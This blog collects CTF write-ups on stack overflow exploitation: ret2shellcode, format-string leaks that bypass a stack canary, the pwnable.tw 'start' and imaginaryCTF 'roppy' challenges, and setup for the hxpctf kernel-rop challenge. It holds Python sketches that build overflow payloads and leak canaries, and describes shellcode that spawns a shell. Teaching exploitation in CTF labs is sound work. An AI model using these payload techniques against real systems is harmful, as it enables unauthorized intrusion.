Saturday, February 24, 2024

[pwn-primer] understanding ret2shellcode + understanding stack based buffer overflow

This post covers an essential pwn technique called ret2shellcode, also commonly referred to as shellcode injection. In a typical pwn challenge (especially an easy one), there's a win() function that we redirect program execution to in order to solve the challenge. However, there are instances where there is no win function. This is where this technique comes in.

Shellcode, in essence, is a sequence of machine instructions (usually written in assembly) that can execute arbitrary commands. In real exploits, it's used to either spawn a shell (either root/admin or low privilege) or execute commands such as displaying the contents of a critical file. In pwn CTF challenges, it's used to spawn a shell (sometimes a root shell) on the remote server to get the flag, or to display the contents of flag.txt directly.

I'll go over a simple program that can be exploited with the use of shellcode.


The program above is quite simple in nature. It just has a main function that defines a 256-byte character buffer on the stack. Next, a printf call displays the address in memory where the buffer_one character buffer is located. Finally, a gets call reads user input into buffer_one.

Guess this is a good time to explain the vulnerability.

The vulnerability in this program is found at the gets call. Why? Because the buffer_one character buffer has been given a length of 256 bytes on the stack, yet gets() reads user input without checking that at most 256 bytes are written to that buffer. The user input can exceed 256 bytes, overwriting whatever sits next to the buffer in memory.

All this is occurring in a region of memory called the stack. Every function call in a C program gets, at runtime, its own section of the stack (referred to as a stack frame). A stack frame holds the local variables of the function it belongs to. For example, in the program above, there is one stack frame for the 'main' function, and the character buffer is 'local' to the main function's stack frame. The stack operates using PUSH and POP operations: PUSH places data on top of the stack and POP takes data off the top of the stack.

A buffer overflow vulnerability can occur on the stack or in another memory region used for dynamic allocation called the heap, but for this post we will focus on the stack. A stack overflow vulnerability in this case means we can write past the end of the buffer and overwrite other important data on the stack, such as other local variables, the saved base pointer and, most importantly, the saved return address.

On the stack, the saved return address is the address that execution returns to once the respective function has finished executing. By overwriting this saved return address with an address of our own, we can redirect execution to wherever we want.
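To make the overwrite concrete, here is a minimal Python sketch that models the frame as a flat byte array. The layout (256-byte buffer, then 8 bytes of saved rbp, then 8 bytes of saved return address) is an assumption based on the description above; a real compiler may add padding, and the addresses used are made up.

```python
import struct

BUF_SIZE = 256  # size of buffer_one as described in the post

def make_frame(saved_rbp, ret_addr):
    """Model a frame as [buffer][saved rbp][saved return address] (assumed layout)."""
    return bytearray(BUF_SIZE) + struct.pack("<QQ", saved_rbp, ret_addr)

def unsafe_gets(frame, data):
    """Copy input into the frame with no bounds check, the way gets() does."""
    frame[0:len(data)] = data
    return frame

def saved_return_address(frame):
    """Read back the 8 bytes that sit after the buffer and the saved rbp."""
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]

# Hypothetical saved rbp and return address, for illustration only.
frame = make_frame(0x7FFDEADBE000, 0x401234)
overflow = b"A" * BUF_SIZE + b"B" * 8 + struct.pack("<Q", 0x4141414141414141)
unsafe_gets(frame, overflow)
print(hex(saved_return_address(frame)))  # 0x4141414141414141
```

Input that stays within 256 bytes leaves the last 16 bytes of the model untouched; anything longer starts eating into the saved rbp and then the return address.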

Let's go back to the program and see this in action. 

After compiling the program with gcc, we can run it and look at its output.


As seen in the source code, the program outputs the address of the buffer on the stack. The next line is blank, which means the program is waiting: this is where the gets() call is blocking for input. By inserting more than 256 bytes, the program should crash. A crash in the program confirms the presence of the buffer overflow vulnerability.


Junk bytes inserted into the program result in a segmentation fault. The program has crashed and the vulnerability is confirmed. As discussed before, there's no win function to redirect execution to, so shellcode will have to be used. pwntools is a Python library that assists with writing exploit scripts. It ships with a collection of shellcode for different operations across different architectures. In our case, we're working with a 64-bit program, so the shellcode will be 64-bit assembly instructions.

execve('/bin/sh') syscall shellcode


The shellcode above performs an execve syscall with the path '/bin/sh' as its first argument to spawn a shell. If you're not well versed in how arguments are passed to functions and syscalls in 64-bit assembly, I recommend you read up on that. The first 4 instructions push the path string onto the stack and place a pointer to it in rdi. The constant 0x732f2f2f6e69622f holds eight bytes of that path, '/bin///s', in little-endian order (the extra slashes are harmless padding). The following instructions use XOR and stack PUSH/POP operations to set up the remaining arguments and ultimately invoke execve.
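If the constant looks like noise, a quick way to read it is to pack it back into bytes. This small sketch only uses the value quoted above and Python's struct module:

```python
import struct

constant = 0x732F2F2F6E69622F  # value quoted in the post

# x86-64 is little-endian, so the lowest byte of the number comes first in memory.
raw = struct.pack("<Q", constant)
print(raw)  # b'/bin///s'
```

Repeated slashes in a path are treated like a single slash, which is why padding the path this way does not change which file gets executed.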

Final Exploit Script


The exploit script is quite simple. Most of it uses pwntools methods. I can't overemphasize how easy pwntools has made writing exploits. The script first calls shellcraft.sh(), which generates the same execve shellcode we saw above. The next section takes the stack address the program prints, parses it as a base 16 (hexadecimal) integer and prints it to the screen. Lastly, the real payload is laid out in order: the shellcode together with capital A's (junk bytes) to fill the 256-byte buffer_one buffer, more junk bytes (0xcafebabe) to overwrite the saved rbp, and finally the buffer address to overwrite the saved return address, so that rip ends up pointing into the buffer. This places the shellcode on the stack and redirects execution to where it was injected, ultimately executing our own code.
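The payload layout described here can be sketched without pwntools, using only the standard library. This is not the original script: the output line format, the placeholder shellcode bytes, and the choice to put the shellcode at the very start of the buffer are all assumptions made for illustration.

```python
import re
import struct

def parse_leak(line):
    """Pull the first 0x... value out of the line the program prints."""
    match = re.search(rb"0x[0-9a-fA-F]+", line)
    if match is None:
        raise ValueError("no address found in output")
    return int(match.group(0), 16)

def build_payload(shellcode, buf_addr, buf_size=256):
    """Shellcode first, A's up to buf_size, junk saved rbp, then the buffer address."""
    if len(shellcode) > buf_size:
        raise ValueError("shellcode does not fit in the buffer")
    filled = shellcode.ljust(buf_size, b"A")
    return filled + struct.pack("<Q", 0xCAFEBABE) + struct.pack("<Q", buf_addr)

# Hypothetical program output and placeholder bytes standing in for real shellcode.
leak_line = b"buffer is at 0x7ffd1c2e4a10\n"
addr = parse_leak(leak_line)
payload = build_payload(b"\xcc" * 8, addr)
print(hex(addr), len(payload))  # 0x7ffd1c2e4a10 272
```

Starting the buffer with the shellcode means the leaked address can be used as the return target directly, with no extra offset to compute.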

The exploit ran and we can see we have a shell. Quite a simple technique. I'm sure I butchered some of the explanation, but essentially this is how shellcode injection works: we inject it onto the stack of a vulnerable process and have execution point to where the shellcode was injected.


Thursday, February 22, 2024

[pwn primer] understanding format string vulnerabilities + bypassing stack canary protection

Previously, we've covered techniques like ret2shellcode, which involves injecting shellcode into a vulnerable process to execute whatever code we want, and the use of ROP gadgets, which is a code reuse attack. With ROP we use code already located within the vulnerable program, specifically short instruction sequences ending with the 'ret' instruction, to set up the stack and registers so that we can execute whatever we want, bypassing the non-executable (NX) bit that prevents shellcode injected onto the stack from executing.

Another exploitation technique is the format string exploit. This technique abuses format specifiers in C. Controlling the format string passed to a function like printf can allow one to read from and write to arbitrary memory locations. I've created a reasonably easy C program that has a format string vulnerability. Let's have a look at it and take it from there.



The main function calls vuln, which defines a 64-byte buffer on the stack. After that, a couple of puts and gets calls are made. puts just outputs predefined text onto the screen, and gets is the vulnerable function, vulnerable specifically to a buffer overflow (read the man page to see the dangers of using gets). To cut the story short, gets() reads user input without any bounds checking on how much input is written.

The format string vulnerability can be spotted on line 13. The first argument to printf is normally a fixed format string containing format specifiers that tell printf how to "print" data onto the screen, such as %d for decimal and %s for strings (more can be found online). In this case, the code passes our input directly to printf as the format string, and that is the vulnerability. We can feed printf any specifier we want and see what contents are spewed from the program.

How does this vulnerability benefit anyone? I'll show you how.

The format string vulnerability can be used to either read from or write to arbitrary areas in memory. This is useful in instances where certain exploitation mitigations such as ASLR or stack canaries need to be bypassed. This post will also go into actually compiling and exploiting the vulnerable program above. This program mimics an easy/medium pwn challenge. Looking at the code overall, we also see a win() function, which shows that this is more of a ret2win type of challenge.

P.S. ret2win just means that the vulnerable pwn challenge contains a 'win' function that program execution needs to be redirected to in order to solve the challenge. The 'win' function isn't called initially, which is why program execution needs to be redirected to that function (usually done when there's a buffer overflow vuln).

The code above can be compiled using the flags in the commented section (one set for 32 bit and one for 64 bit). This demo will look at the 64-bit build.

After compiling the program, let's have a look at the binary protections and see what exploit mitigations are enabled to have a feel on what we're dealing with.


We have 2 protections enabled: a stack canary and the NX bit. The NX bit we've already discussed. It renders shellcode injection on the stack useless, as the stack is non-executable. Cool. But the stack canary is what we haven't covered... and I'd like to do that now.

The stack canary is simply a random value placed on the stack, meant to detect buffer overflows before they can hijack execution. Specifically, it is a random value whose lowest byte is '\x00', placed at rbp-0x8 (8 bytes below the saved base pointer on x64). To give more clarity on this, let's have a look at the vulnerable program in a disassembler and see how the canary is initialised.


A quick IDA inspection shows the execution branches of the vuln function, where most of the program functionality is. The function prologue at the very beginning shows that 50h bytes have been reserved on the stack for this function. Right after that, we see fs:28h being moved into the rax register, and then that value being stored at a memory location IDA displays as rbp+var_8. This is the stack canary being initialised. IDA's var_8 stands for the offset -8, so this is the same location gdb shows as rbp-0x8; the two tools just write it differently.

At the end, we see the canary on the stack being compared with the original value at fs:28h. If the user input overwrote rbp-0x8 and whatever was written there does not equal the random value assigned at runtime, then __stack_chk_fail is called, reporting that a buffer overflow has been detected, and the program aborts.

That's how a stack canary works. 

Since the program has initialized a random value at rbp-0x8, then we need to find a way to use the format string vuln to leak the canary value from the stack, as that will be the mechanism with which the canary protection can be bypassed in this instance. Besides this, you can bruteforce the canary byte by byte, but right now the format string can allow us to leak it directly from the stack.

by inserting %p into the program, we can leak the contents of the stack to stdout, and it turns out that the canary can be found at the 15th position of %p inserted into the program.



Since the canary's lowest byte is '\x00' as stated earlier, we know that this is the canary. The null byte shows up at the end of the leaked value because %p prints the 8 bytes as a single number, and on a little-endian machine the first byte in memory is the least significant one. However, the canary changes with every execution because it is randomly generated each time the process starts, so the final exploit script will automate this process and make it cleaner. Aside from that, this is how the format string vuln can be used. This is an essential pwn technique and can get a lot more advanced than this. This is as basic as it gets.
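Picking the canary out of a %p dump is easy to automate. The sketch below builds a positional specifier for a given slot and applies the "lowest byte is zero" check to a list of leaked values. The leaked values are invented for illustration, and only the position (15) comes from the post.

```python
def format_probe(index):
    """Build a positional specifier such as %15$p to print one stack slot."""
    return f"%{index}$p"

def parse_pointers(output):
    """Turn whitespace-separated %p output into integers; glibc prints (nil) for 0."""
    return [0 if tok == "(nil)" else int(tok, 16) for tok in output.split()]

def looks_like_canary(value):
    """A canary candidate is non-zero, 8 bytes wide, and has a zero lowest byte."""
    return value != 0 and value & 0xFF == 0 and value >> 56 != 0

# Made-up leak of 15 values; the last one plays the role of the canary.
sample = " ".join(["0x7ffe5c3a1b20", "(nil)"] + ["0x1"] * 12 + ["0x8d3c1f6a2b9e4700"])
values = parse_pointers(sample)
print(format_probe(15), hex(values[14]), looks_like_canary(values[14]))
```

The check is only a heuristic: other values on the stack can also end in a zero byte, so it helps to confirm that the candidate changes between runs while keeping that trailing 00.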

The final exploit payload will be the padding + canary_leak + additional 8 bytes to overwrite rbp + address to win function (overwrite rip address with win function)
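As a rough sketch of that layout in plain Python (the original script uses pwntools): the 72-byte padding assumes the 64-byte buffer starts at rbp-0x50 so that 72 bytes separate it from the canary at rbp-0x8, and the canary and win() address below are placeholders, not values from the real binary.

```python
import struct

def build_canary_payload(canary, win_addr, padding_len=72):
    """padding + leaked canary + 8 junk bytes for saved rbp + address of win()."""
    return (
        b"A" * padding_len              # fills the buffer up to the canary slot
        + struct.pack("<Q", canary)     # put the leaked canary back unchanged
        + b"B" * 8                      # overwrites saved rbp
        + struct.pack("<Q", win_addr)   # overwrites the saved return address
    )

# Placeholder values for illustration only.
payload = build_canary_payload(0x8D3C1F6A2B9E4700, 0x401196)
print(len(payload))  # 96
```

Because the canary is written back with the exact value that was leaked, the check at the end of vuln passes and the overwritten return address is used.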

Final Exploit Script



The exploit script is quite small; all it does is exploit the format string vuln to leak the canary and ultimately bypass it. As seen above, once the exploit script is run, it leaks the canary from the vulnerable process and shows us the message "you win", signifying that we've successfully redirected execution to the win() function.

Hopefully this shed a bit more light on how format string vulnerabilities work. This vulnerability can be discovered and used in other ways not mentioned here, but this is enough to serve as a primer for beginners or intermediate pwners who want to up their game. Learning the art of pwn requires knowledge of reversing, which is a topic worthy of its own blog post that I will do in future.

More resources:

pwn.college - Hacking platform maintained by Arizona State University. They also host lectures available on twitch and youtube. Highly recommended for beginner pwners.

CTF-Wiki - Overall CTF wiki teaching the basics of pwn as well as other challenge categories like Crypto, Web and Forensics. Highly recommended (translate the page to English, as it's originally written in Chinese).


Saturday, February 17, 2024

[pwnable_tw - pwn] start (100 pts)

This pwn challenge is quite easy. Got nervous at first but eventually got it. The challenge provides a netcat IP and port to run the exploit script against, as well as the 32-bit binary that's running on that port for local debugging. So, let's look at the binary.



The challenge has every protection disabled, which means shellcode injected into the challenge process will run, as the stack is executable. Running the binary just asks for user input and exits after input is given. Let's look at what's happening under the hood.

The binary is stripped, so most symbols are not present for us to see. However, an entry function is present in the disassembly.


entry0() function does a few things:

- pushes esp and _exit onto the stack

- performs xor operations on eax, ebx, ecx and edx (which basically zeroes out these registers)

- pushes a total of 20 bytes onto the stack (which turns out to be the "Let's start the CTF:" string the binary outputs when it executes)

- calls the write() syscall (mov al, 4 selects sys_write and mov bl, 1 selects stdout as the file descriptor)

- calls the read() syscall (mov al, 3 selects sys_read) and receives up to 60 bytes of input

- adds 20 to esp, moving it past the 20 bytes pushed for the string

- finally, a 'ret' instruction is executed, which pops the pushed _exit() address into eip (0x804809d = _exit() address)
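The "20 bytes pushed onto the stack" step is easier to picture by splitting the banner into the 4-byte values a 32-bit push would need. This sketch derives them from the string itself rather than from the disassembly:

```python
import struct

message = b"Let's start the CTF:"  # banner text quoted in the post

# Split into 4-byte chunks and read each chunk as a little-endian dword.
chunks = [message[i:i + 4] for i in range(0, len(message), 4)]

# The stack grows downwards, so the end of the string has to be pushed first
# for the start of the string to end up at the lowest address (esp).
push_order = [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

for value in push_order:
    print(f"push {value:#010x}")
```

Five pushes of four bytes each give the 20 bytes that write() prints, which is also why the function later adds 20 to esp before returning.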


To exploit the challenge, a couple of things need to be done. Firstly, we need to use the buffer overflow vuln to gain eip control and leak a stack address. Since the NX bit is disabled, shellcode injection into the challenge process is viable, with a twist. Usually a 'jmp esp' instruction would be used to have program execution jump to the injected shellcode, since it sits on the stack once injected. However, there is no 'jmp esp' gadget in the binary, so another gadget has to be used to leak the stack address instead, which tells us where the shellcode will be.


The gadget above is actually a slice of the entry function itself, specifically from the mov ecx, esp instruction through to the ret. If analyzed carefully, this sets eip back to a point in the program before the sys_read syscall is invoked (state of program before sys_read = 0x08048086 approx., sys_read call invocation = 0x08048087).


The payload = padding (input buffer to eip control offset) + (leaked stack address + length of the padding) + shellcode. As seen above, the padding, which is user input, starts at esp + 0, the offset pointing to the top of the stack. The shellcode was taken from the shell-storm website.
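Put together, the exploit is two sends. The sketch below builds both in plain Python. Several things here are assumptions: that 0x08048087 (the address quoted above) is where the mov ecx, esp gadget starts, that the first 4 leaked bytes are the saved esp, and that the placeholder bytes stand in for real shellcode.

```python
import struct

PADDING_LEN = 20          # bytes between the input buffer and the return address
LEAK_GADGET = 0x08048087  # address quoted in the post; assumed gadget start
READ_LIMIT = 60           # read() accepts at most 60 bytes

def stage_one():
    """Overflow once to return into the gadget that prints the stack."""
    return b"A" * PADDING_LEN + struct.pack("<I", LEAK_GADGET)

def parse_esp(leak):
    """Assume the first 4 leaked bytes are the saved esp, little-endian."""
    return struct.unpack("<I", leak[:4])[0]

def stage_two(esp, shellcode):
    """NOP padding + (leaked address + padding length) + shellcode."""
    payload = b"\x90" * PADDING_LEN + struct.pack("<I", esp + PADDING_LEN) + shellcode
    if len(payload) > READ_LIMIT:
        raise ValueError("payload exceeds what read() will accept")
    return payload

fake_leak = struct.pack("<I", 0xFFFFD1A4) + b"\x00" * 16  # made-up leak
second = stage_two(parse_esp(fake_leak), b"\xcc" * 4)      # placeholder shellcode
print(len(stage_one()), len(second))  # 24 28
```

The 60-byte read limit leaves 36 bytes for the shellcode after the 20 bytes of padding and the 4-byte return address, so a compact execve payload is needed.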

Normally the padding would be a bunch of 0x41 bytes (A) up to the eip control offset, but using a NOP sled (a run of 0x90 bytes, instructions that do nothing) gave a more reliable result.

Final exploit script





pwned.

 


Tuesday, February 6, 2024

[imaginaryCTF - pwn] roppy (75 pts)

Hi. back with another writeup for the imaginaryCTF 'roppy' pwn challenge. This challenge is old but still a good one to brush up on basic pwning.

Challenge description:


The challenge description shows that it's just another ROP challenge, which means that the NX stack protection is probably enabled. We can run checksec on the binary to confirm the suspicion:


As suspected, NX is enabled, so a ret2shellcode attack won't work. The offset from user input to the saved return address (RIP control) is 72 bytes. This can be calculated by creating a cyclic pattern of 100 bytes, loading the binary into pwndbg (a gdb extension), feeding it the pattern, and calculating the offset with 'cyclic -l'.
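The idea behind the cyclic pattern can be shown with a few lines of Python. This is a stand-in, not pwntools' implementation: it uses the simpler 'Aa0Aa1Aa2...' style of pattern, where every short window of bytes appears only once, so the bytes found at the crash reveal their own offset.

```python
from string import ascii_lowercase, ascii_uppercase, digits

def pattern(length):
    """Build a pattern of 'Aa0Aa1Aa2...' triples; short substrings are unique."""
    triples = (u + l + d
               for u in ascii_uppercase
               for l in ascii_lowercase
               for d in digits)
    return "".join(triples)[:length].encode()

def find_offset(crash_bytes, length=100):
    """Return where the bytes seen at the crash sit inside the pattern."""
    return pattern(length).find(crash_bytes)

# Simulate a crash: pretend the 8 bytes that landed on the saved
# return address were the ones 72 bytes into our input.
sent = pattern(100)
landed_on_ret = sent[72:80]
print(find_offset(landed_on_ret))  # 72
```

In a real session the 8 bytes would be read from the top of the stack in the debugger at the moment of the crash, instead of being sliced out of the pattern.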


Next, we jump to the middle of the main function to execute system("/bin/sh") and finally get a shell. The address of that spot in main can be found in gdb.

Exploit script.




exploit script works. we get shell! 


Saturday, February 3, 2024

Kernel pwn basics for CTF - GETTING MY HANDS DIRTY (Part 1) -- [hxpctf 2020 'kernel-rop']

For a while, I've been keen to try and learn about kernel pwn. Kernel pwn, or Linux kernel exploitation, is essentially vulnerability research and exploitation of the Linux kernel. This includes source code auditing to understand program behaviour, debugging & fuzzing for dynamic analysis, vulnerability discovery and exploit development. I'm writing this without a 360 degree, full-fledged understanding of kernel pwn, but writing it to drill the info into my head first, and then into yours (hopefully!). This used to look like such a strange and elite type of knowledge, but since I've immersed myself a bit in it and generally got my feet wet, it wouldn't be so bad to share the one or two things I've learnt.
If you don't know what a kernel is, then let this serve as a chilled way to start. The kernel is hands down the most important part of an operating system. It handles all the communication between hardware and software in a system and services all the syscalls (system calls) that programs need in order to run. Since this is particularly important, and you know this blog is all about hacking and learning more about computer security, then you already know what time it is!

I'm going to be diving in to kernel pwn and understanding all the exploit techniques used as well as how to bypass the relevant mitigations. Keep in mind that this series will be split up into different posts so get your mind ready for that too. As opposed to userland pwn, this series will be somewhat of an advanced topic, especially with regards to the background knowledge so just keep that in mind. Obviously, hacking into a system you have no permission to can result in serious repercussions that can potentially ruin your future in an instant, so I will preface this post with this:

***DO NOT HACK INTO A SYSTEM YOU HAVE NO EXPLICIT PERMISSION TO. IT IS ILLEGAL AND ENGAGING IN SUCH WILL LAND YOU IN JAIL. 

Got it? cool.

Let's start off.

In Linux, kernel modules are commonly grouped by the kind of device they drive: 'char', 'block' and 'network'. Compiled modules usually end with the .ko extension (which stands for kernel object) and are originally written in C.

In a typical kernel pwn CTF challenge, the task is essentially to achieve local privilege escalation by exploiting a vulnerable kernel module which is installed on boot. It is actually quite similar to userland pwn (normal pwnable binaries), except that, from what I know and have seen, userland pwn exploit scripts are usually written in Python while kernel pwn exploits are written in C.

To go in depth, I'll go over the kernel-rop CTF challenge, which shows what a typical Linux kernel pwn challenge looks like, and go over the ways I've learnt to approach these challenges. Let's have a look at some key challenge files that we will be focusing on.


There are quite a few files here, but the following are the most important ones qemu uses to emulate the challenge:

vmlinuz - This is the actual Linux kernel, except it has been compressed to make the file smaller (sometimes it is also named bzImage).

initramfs.cpio.gz - This is the Linux file system (a cpio archive compressed with gzip) where /bin, /etc and many other important Linux directories are found. The vulnerable kernel module is also located somewhere in this file system.

run.sh - This shell script actually contains the qemu boot configuration. (qemu is simply just a system emulation tool)

Now that we're aware of the important files needed to take on the challenge, the next thing we have to do is use the extract-image.sh script to extract the kernel ELF file (yes, the Linux kernel is an ELF executable file). We do this because, as the name of the challenge, "kernel-rop", suggests, we will be dealing with ROP chains, just as we would when exploiting userland pwn challenges. We can use the following command to extract the kernel ELF file like so:

Now that we have the kernel ELF file extracted under the name 'vmlinux', the next thing we have to do is extract all the ROP gadgets from the kernel ELF file. If you're not caught up to speed with what ROP gadgets are, then I'll do you a favour and give an overview. ROP gadgets are short sequences of assembly instructions inside an ELF file that end with a RET instruction. ROP gadgets can be chained within an exploit payload to set up the stack and registers in such a way as to achieve code execution, especially if the non-executable bit is enabled.
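Once the gadget dump exists, it is usually searched for a handful of exact gadgets. The helper below is a small sketch of such a search in Python; it assumes the dump is in the "address : instructions" line format that ROPgadget prints, and the sample lines and addresses are made up.

```python
def find_gadgets(dump, wanted):
    """Return addresses of lines whose instruction text matches `wanted` exactly."""
    hits = []
    for line in dump.splitlines():
        address, sep, instructions = line.partition(" : ")
        if sep and instructions.strip() == wanted:
            hits.append(int(address, 16))
    return hits

# Hypothetical excerpt of a gadget dump, for illustration only.
sample_dump = """\
0xffffffff81006370 : pop rdi ; ret
0xffffffff8100767c : pop rdi ; pop rbp ; ret
0xffffffff81004d11 : pop rax ; ret
"""

print([hex(a) for a in find_gadgets(sample_dump, "pop rdi ; ret")])
```

Matching the whole instruction text, rather than searching for a substring, avoids picking up longer gadgets that merely contain the wanted instructions.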

Since the kernel ELF file is quite big, I'll execute this command to extract all the ROP gadgets:



p.s make sure you have ROPGadget installed or even ropper as well. Like i said, the kernel ELF file is a big boy so i'll leave this to run in the background. Could take a good while. 

Now we deal with the compressed initramfs file which contains the linux file system. To have the entire file system exposed to us we have to make use of the decompress.sh script. Let's go into it deeper.




The script basically creates a new directory called initramfs, navigates into it, copies initramfs.cpio.gz from the parent directory into the current working directory, and then extracts it with gunzip and cpio. Let's quickly run the script.
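For a sanity check before running cpio, the gunzip half of that script can be mirrored in Python. This sketch only decompresses the data and verifies it looks like a "newc" cpio archive (the format used for Linux initramfs images); unpacking the files is still left to cpio. The archive used in the demo is a fake, in-memory stand-in.

```python
import gzip

NEWC_MAGICS = (b"070701", b"070702")  # cpio "newc" format, without/with checksum

def gunzip_initramfs(blob):
    """Decompress gzip data and check that a newc cpio archive comes out."""
    data = gzip.decompress(blob)
    if data[:6] not in NEWC_MAGICS:
        raise ValueError("decompressed data is not a newc cpio archive")
    return data

# Stand-in for initramfs.cpio.gz: a gzip stream holding a fake 110-byte header.
fake_archive = gzip.compress(b"070701" + b"0" * 104)
print(len(gunzip_initramfs(fake_archive)))  # 110
```

With the real file, the bytes would come from reading initramfs.cpio.gz in binary mode instead of from gzip.compress.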


This is the result of running decompress.sh. It has extracted the file system, and here we see an interesting file called 'hackme.ko'. This is the vulnerable module we are to exploit.

When we run the decompress.sh script, we do it, not only to have a hold of the vulnerable kernel module to analyze, but also to do a file modification that will be very important. firstly, we will have a look at what exactly this file is.


Within the /etc directory in the file system is the inittab file. This file tells us that when we finally run the run.sh qemu boot script, the shell is started with user ID and group ID 1000 instead of 0. As an unprivileged user we cannot proceed with debugging the kernel, so we have to change the 1000 to 0 in order to boot into qemu as root, which enables debugging and makes the overall exploitation process easier. Like so:

setuidgid from '1000' to '0'
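The same edit can be scripted so it is repeatable every time the file system is re-extracted. A minimal sketch, assuming the line to change contains "setuidgid 1000"; the sample line is hypothetical and the real inittab entry may look different:

```python
import re

def drop_to_root(text):
    """Rewrite 'setuidgid 1000' to 'setuidgid 0', leaving everything else alone."""
    return re.sub(r"(setuidgid\s+)1000\b", r"\g<1>0", text)

sample = "setuidgid 1000 /bin/sh\n"  # hypothetical line from the init config
print(drop_to_root(sample), end="")  # setuidgid 0 /bin/sh
```

Remember to switch the value back to 1000 when testing the finished exploit, since the point of the challenge is to escalate from the unprivileged user.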

Once this is done, we just have to use compress.sh to recompress the file system so the change is saved before booting it with qemu.


Compressed. 

the run.sh script (qemu)

Now that we have that done, before I round up, let's look at the run.sh script.



Some of these flags give us all the info we need to get started with the challenge.

-m -> sets the amount of memory given to the VM
-kernel -> specifies the compressed kernel image
-initrd -> specifies the initial file system (our initramfs)
- the script also enables protections like kaslr, smep and smap, which are exploitation mitigations that are active once the image boots when we finally run the script.
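Reading these flags off by eye works, but a few lines of Python can summarise which mitigations a run.sh turns on. The script text below is a hypothetical example written for this sketch, not the challenge's actual run.sh, and the parser only handles simple "-flag value" pairs.

```python
import shlex

def parse_qemu_args(script):
    """Map each -flag to its value ('' when the flag takes none)."""
    tokens = shlex.split(script.replace("\\\n", " "))
    options = {}
    i = 1  # skip the qemu binary name
    while i < len(tokens):
        name = tokens[i]
        has_value = i + 1 < len(tokens) and not tokens[i + 1].startswith("-")
        options[name] = tokens[i + 1] if has_value else ""
        i += 2 if has_value else 1
    return options

def mitigations(options):
    """Report smep/smap from -cpu and kaslr from the kernel command line."""
    cpu_flags = options.get("-cpu", "").split(",")
    cmdline = options.get("-append", "").split()
    return {
        "smep": "+smep" in cpu_flags,
        "smap": "+smap" in cpu_flags,
        "kaslr": "kaslr" in cmdline and "nokaslr" not in cmdline,
    }

# Hypothetical run.sh contents, for illustration only.
sample_run_sh = r'''qemu-system-x86_64 \
    -m 128M \
    -cpu kvm64,+smep,+smap \
    -kernel vmlinuz \
    -initrd initramfs.cpio.gz \
    -append "console=ttyS0 kaslr quiet panic=1"
'''

opts = parse_qemu_args(sample_run_sh)
print(opts["-m"], mitigations(opts))
```

While learning, it is common to edit these same flags (for example removing +smep and +smap) to practise against a weaker configuration first.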

So we've gone through a good number of things to set up the environment and finally get to pwning the kernel. Remember, I am no pro at this. I just have a fundamental understanding of userspace pwn challenges, built up over the time I've been actively doing pwn CTF challenges, and that has been enough to get me started. In the next blog post, we'll go into actually running the run.sh qemu shell script, attaching gdb to the challenge, doing some reversing and establishing the attack strategy.